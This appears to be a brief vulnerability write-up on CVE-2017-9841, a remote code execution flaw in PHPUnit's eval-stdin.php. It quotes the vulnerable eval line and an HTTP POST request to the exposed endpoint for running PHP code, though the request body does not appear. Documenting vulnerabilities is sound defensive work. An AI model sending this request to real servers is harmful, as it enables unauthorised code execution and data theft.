PHPUnit eval-stdin.php remote command execution vulnerability CVE-2017-9841
Vulnerability Description
PHPUnit versions before 5.6.3 contain a remote code execution vulnerability that allows an attacker to obtain sensitive information and permissions on the server.
Vulnerability Impact
PHPUnit < 5.6.3
Vulnerability Reproduction
The vulnerability is located in /phpunit/src/Util/PHP/eval-stdin.php
The key code is:
eval('?>'.file_get_contents('php://input'));
Sending the following request executes PHP code on the server:
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host:
Content-Length: 21
Accept-Encoding: gzip
This post is licensed under CC BY 4.0 by the author.